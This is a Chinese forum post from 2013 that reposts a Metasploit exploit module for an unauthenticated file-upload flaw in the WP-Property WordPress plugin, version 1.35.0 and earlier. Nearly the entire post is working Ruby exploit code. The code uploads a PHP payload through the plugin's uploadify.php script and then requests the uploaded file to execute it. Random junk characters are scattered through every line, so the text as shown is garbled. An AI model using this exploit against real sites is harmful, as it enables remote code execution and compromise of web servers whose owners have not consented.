WordPress WP-Property PHP 文件上传漏洞
! L; a% M+ V i. g# N2 T
" Z- m$ O- b4 e V5 x O9 o ## # This file is part of the Metasploit Framework and may be subject to
1 E# v9 i. ^% z* \
4 L' g' E* i$ z) Z# p# redistribution and commercial restrictions. Please see the Metasploit
" w0 m# ^! q+ f- L/ }, E% {; w! A, l4 f& u& z! f4 O2 b: j
# Framework web site for more information on licensing and terms of use.
1 | l# e2 K# H% f6 i% R! {# r/ q# J$ D! S( S
# http://metasploit.com/framework/ ##: I0 J- |+ d) A; [% M0 C7 E
/ J, ]5 B. n# L: U
+ v% I% U+ Y1 U# v; U/ ]+ j1 d! a6 W4 D$ B T
. u- b0 k5 ]' B
/ x$ I2 ]+ i- X) Y; wrequire 'msf/core'
9 t1 H& E2 m, J6 D$ trequire 'msf/core/exploit/php_exe'& p+ _+ a( t [6 z- q4 [ a
- I4 N% p2 f0 v+ a
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',8 A6 O2 Y/ G) |- p. e
'Description' => %q{- w3 x1 ?% { L" l$ S6 E
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>& g! \$ ~1 h% f {
[
) d7 {0 h. J; l2 a$ A8 j- \'Sammy FORGIT', # initial discovery
; p& D+ u" G1 `3 I) r'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 Z; Y% r+ z( Z! q; m( x6 G% E
],/ y O" p y9 e% n: g4 A
'License' => MSF_LICENSE,
9 t$ A5 ]7 g9 d9 Z1 {3 |6 b$ C'References' =>
; M- n1 b' b& A2 B0 n[' U& z( V' P9 n# }
[ 'OSVDB', '82656' ],8 o& K& W! m4 X8 M: _
[ 'BID', '53787' ],( f+ D+ L# U: t6 C5 `+ V: O
[ 'EDB', '18987'], k# K" j/ A5 N
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]- A2 h4 O% g/ o; k" [& F3 n) }$ t
],
9 f- b9 e* e5 F. ?'Payload' =>/ e/ v, S! o1 G! w6 ^
{* d& F3 o5 T( ~4 l/ f5 F; W
'BadChars' => "\x00",
6 ^6 g- L, m A* m},0 f" r3 A3 p4 H, \$ a1 b/ k
'Platform' => 'php',5 [5 C4 d0 X8 G H. J9 X! P
'Arch' => ARCH_PHP,& G; j# W. t5 j. c6 ]- I' n5 N
'Targets' =>
7 _1 _$ a8 x" V* y9 z& q3 |- ], P[4 c) |+ d$ z7 B! I! E3 L3 g/ r+ i
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],2 Y0 V" B x- k* c" Z$ {
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 N( N7 I. Y7 u% R],; _7 T) W! X" i+ d3 S
'DefaultTarget' => 0,9 X; A, j$ ?4 Y8 |% ?; p( f5 j, K+ a
'DisclosureDate' => 'Mar 26 2012'))
" s3 m$ B. A! N2 h
9 K% z( j \& C3 C: l) {register_options(
( D) u/ J3 @9 q( R$ a[' _7 B: y* W- X# @( F
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])/ X$ P$ Z h' k1 m& l' Q4 Q
], self.class)$ U/ e: f( p' v% c4 M
end
3 a6 Q! b& z! m! O- }6 h3 ]" n
. I s, `6 ?& udef check
$ ^5 d# R6 @( h' k6 R0 wuri = target_uri.path
$ k" g' |6 N4 y( ]* q) _ V" juri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',( P$ z1 Z8 }* A w7 \4 a5 X
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"& m6 N6 I2 Z; a3 \3 ]2 k1 v
})
$ P' y5 N% e0 `4 Y& V0 t4 G% W3 P0 p7 A5 P9 G( ^1 y5 J2 ^$ W
if not res or res.code != 200
/ U) U) d, i8 K; T, G, x5 Q4 hreturn Exploit::CheckCode::Unknown
/ z; `4 j1 ]: Xend+ g m) V" j! H B$ p
8 O- ^& X: [# \- p# \/ B
return Exploit::CheckCode::Appears
' @7 Y# Y2 P1 Q- Hend( g, m9 w" D$ P6 g/ R1 f& Q% x
! o! T5 H5 ]: h) O) R. q3 [
def exploit; s# s0 T7 r$ H/ G8 C
uri = target_uri.path2 b* c0 v. k: R
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)$ q: x* F4 b: d( c
8 }5 A- ?) K5 D$ l; D$ Edata = Rex::MIME::Message.new5 e+ C C; v( Q6 e! e2 i. a) i
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) w' p& K6 I0 P3 N J( w6 k5 A! _0 Hdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
3 c- b: v$ b) p8 tpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')5 g8 p4 C z0 E3 q, h0 P
' C3 N% P2 d4 T' ?6 e, A
print_status("#{peer} - Uploading payload #{@payload_name}")
" C& p1 m) d8 J$ C) a% S: p. Lres = send_request_cgi({8 _) y/ A- l8 |. e" S
'method' => 'POST',
0 [5 v1 m0 C" ]' V' C |'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",5 Y: k* @1 g3 |5 R9 ?& Y$ G8 |
'ctype' => "multipart/form-data; boundary=#{data.bound}",6 n% |7 F3 t& {* r
'data' => post_data
2 [0 e0 z) r, r, k: e})1 P7 ]' y7 N4 z( H g$ M! i1 t+ g
8 B/ W/ _1 R% t8 Q2 j7 [9 Nif not res or res.code != 200 or res.body !~ /#{@payload_name}/9 {3 I! m) u F# h% K; ?# A; ~/ N6 Z4 {4 q
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ J. K/ ]3 S F P# X3 {4 \) x" jend
8 a ]' ?; W% p% ~
* F9 x9 Z& ^- D' Lupload_uri = res.body
) r8 O* s8 O$ z7 X! u1 T1 ]) j( f# |8 H" J
print_status("#{peer} - Executing payload #{@payload_name}")
/ |1 }+ }- V8 E/ L4 j% \res = send_request_raw({
9 Q" M/ e a1 ?4 w0 C/ j'uri' => upload_uri,, x. _; f& W: I- x8 J
'method' => 'GET'5 v7 B/ m3 k: n- K
})9 X/ o! t, T/ y H. ?7 v* p
end
7 n3 w" N: q+ G `end
! q% X6 N' b l8 ^2 E; G
; Q& K, o4 x3 m不要问我这写的是什么 怎么利用 我是说msf.
! U/ |! ]* i0 \% J
5 g2 X+ p: W# M' C |
发表于 2013-1-4 19:51:30
收藏
支持
反对